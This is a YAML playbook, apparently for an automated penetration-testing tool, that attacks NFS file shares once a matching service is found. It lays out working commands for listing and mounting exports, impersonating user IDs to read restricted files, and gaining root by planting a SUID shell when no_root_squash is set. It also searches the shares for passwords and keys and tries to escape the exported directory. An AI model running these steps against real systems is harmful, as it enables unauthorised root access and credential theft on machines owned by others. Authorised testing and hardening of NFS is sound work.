id: nfs_pentesting
name: NFS Penetration Testing (Port 2049)
description: Comprehensive Network File System enumeration, mounting, and privilege escalation based on HackTricks methodology
category: enumeration
risk_level: high
batch_compatible: true

triggers:
  - id: trigger_nfs_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [2049, 111] }
      protocol: { "$in": ["nfs", "rpc", "tcp", "udp"] }
    required_count: 1
    priority: 4
    description: Triggers when NFS service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: nfs_enumeration
    name: NFS Export Enumeration
    description: List available NFS exports and permissions
    order: 1
    timeout_seconds: 60
    commands:
      - tool: showmount
        platforms: [linux, macos]
        command: "showmount -e {host}"
        preferred: true
        notes: "List exported NFS shares (NFSv3)"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap --script nfs-ls,nfs-showmount,nfs-statfs -p 2049 {host} -oN nfs_enum_{host}.txt"
        preferred: true
        notes: "Comprehensive NFS enumeration with nmap"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/nfs/nfsmount; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "Metasploit NFS mount scanner"
        requires_elevation: false

  - id: nfs_version_detection
    name: NFS Version Detection
    description: Identify NFS version and supported features
    order: 2
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV -p 2049,111 {host}"
        preferred: true
        notes: "Detect NFS and RPC versions"
        requires_elevation: false
      - tool: rpcinfo
        platforms: [linux, macos]
        command: "rpcinfo -p {host}"
        preferred: false
        notes: "Query RPC services and versions"
        requires_elevation: false

  - id: nfs_mount_share
    name: NFS Share Mounting
    description: Mount NFS shares for file access
    order: 3
    timeout_seconds: 120
    commands:
      - tool: mount
        platforms: [linux, macos]
        command: "mkdir -p /mnt/nfs_{host} && mount -t nfs -o vers=3,nolock {host}:{export_path} /mnt/nfs_{host}"
        preferred: true
        notes: "Mount NFS share (NFSv3, no auth/locks)"
        requires_elevation: true
      - tool: mount
        platforms: [linux, macos]
        command: "mount -t nfs -o vers=4,nolock {host}:/ /mnt/nfs_{host}"
        preferred: true
        notes: "Mount NFSv4 root export"
        requires_elevation: true

  - id: nfs_uid_gid_impersonation
    name: NFS UID/GID Impersonation
    description: Access files by impersonating UIDs/GIDs
    order: 4
    timeout_seconds: 180
    commands:
      - tool: bash
        platforms: [linux, macos]
        command: "ls -la /mnt/nfs_{host}"
        preferred: true
        notes: "List files and check UIDs/GIDs of interesting files"
        requires_elevation: false
      - tool: useradd
        platforms: [linux]
        command: "useradd -u {target_uid} nfsuser && su - nfsuser"
        preferred: true
        notes: "Create local user with target UID to access files"
        requires_elevation: true
      - tool: nfsshell
        platforms: [linux, macos]
        command: "nfsshell {host}"
        preferred: false
        notes: "Interactive NFS shell with UID/GID manipulation"
        requires_elevation: false

  - id: nfs_no_root_squash
    name: NFS no_root_squash Exploitation
    description: Check for and exploit no_root_squash misconfiguration
    order: 5
    timeout_seconds: 180
    commands:
      - tool: bash
        platforms: [linux, macos]
        command: "echo 'int main() { setuid(0); setgid(0); system(\"/bin/bash\"); return 0; }' > /tmp/pwn.c && gcc /tmp/pwn.c -o /mnt/nfs_{host}/pwn && chmod +s /mnt/nfs_{host}/pwn"
        preferred: true
        notes: "Create SUID root shell on NFS share (if no_root_squash enabled)"
        requires_elevation: true
      - tool: bash
        platforms: [linux]
        command: "cp /bin/bash /mnt/nfs_{host}/bash && chmod +s /mnt/nfs_{host}/bash"
        preferred: true
        notes: "Copy bash with SUID bit (requires no_root_squash)"
        requires_elevation: true

  - id: nfs_file_enumeration
    name: NFS Sensitive File Search
    description: Search for sensitive files in NFS shares
    order: 6
    timeout_seconds: 300
    commands:
      - tool: find
        platforms: [linux, macos]
        command: "find /mnt/nfs_{host} -type f \\( -name '*.conf' -o -name '*.xml' -o -name '*.txt' -o -name '*password*' -o -name '*backup*' \\) 2>/dev/null"
        preferred: true
        notes: "Search for configuration and password files"
        requires_elevation: false
      - tool: grep
        platforms: [linux, macos]
        command: "grep -r -i 'password\\|secret\\|key' /mnt/nfs_{host} 2>/dev/null | head -100"
        preferred: false
        notes: "Search file contents for credentials"
        requires_elevation: false

  - id: nfs_subtree_escape
    name: NFS Subtree Check Bypass
    description: Attempt to escape from exported directory to other filesystems
    order: 7
    timeout_seconds: 120
    commands:
      - tool: nfs_analyze
        platforms: [linux]
        command: "nfs_analyze.py {host} {export_path}"
        preferred: true
        notes: "Automated subtree check bypass (requires nfs-security-tooling)"
        requires_elevation: false
      - tool: bash
        platforms: [linux, macos]
        command: "cd /mnt/nfs_{host} && find . -type d -name '..' 2>/dev/null"
        preferred: false
        notes: "Manual directory traversal attempts"
        requires_elevation: false

  - id: nfs_unmount
    name: NFS Share Unmounting
    description: Cleanly unmount NFS shares
    order: 8
    timeout_seconds: 60
    commands:
      - tool: umount
        platforms: [linux, macos]
        command: "umount /mnt/nfs_{host}"
        preferred: true
        notes: "Unmount NFS share"
        requires_elevation: true

metadata:
  tools:
    - showmount
    - nmap
    - mount
    - umount
    - nfsshell
    - metasploit
    - rpcinfo
    - nfs_analyze
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting
    - https://github.com/hvs-consulting/nfs-security-tooling
    - https://www.hvs-consulting.de/en/nfs-security-identifying-and-exploiting-misconfigurations/
  techniques:
    - NFS export enumeration
    - UID/GID impersonation
    - no_root_squash privilege escalation
    - SUID binary creation
    - Subtree check bypass
    - File system escape
  batch_commands:
    showmount: "parallel -j 10 'showmount -e {} > nfs_exports_{}.txt' :::: {targets_file}"
    nmap_scan: "nmap --script nfs-showmount,nfs-ls -p 2049 -iL {targets_file} -oN nfs_scan.txt"
  notes: |
    NFS security relies heavily on proper configuration:

    DANGEROUS SETTINGS:
    - no_root_squash: Allows root UID (0) access without squashing to nobody
    - no_all_squash: Trusts all client UIDs/GIDs
    - rw permissions: Allows writing to the share
    - subtree_check disabled (default on Linux): May allow filesystem escape

    PRIVILEGE ESCALATION:
    1. Mount NFS share with no_root_squash
    2. Create SUID root binary on the share
    3. Execute SUID binary from target system to get root shell

    UID/GID IMPERSONATION:
    - By default, only root (UID 0) is squashed to nobody
    - Create local user with target UID to access restricted files
    - Files owned by root but group != 0 may be accessible (e.g., /etc/shadow)

    FILE SYSTEM ESCAPE:
    - If export is a subdirectory and subtree_check is disabled
    - May be able to access parent directories outside the export
    - Can potentially read logs, write webshells, access /etc/shadow
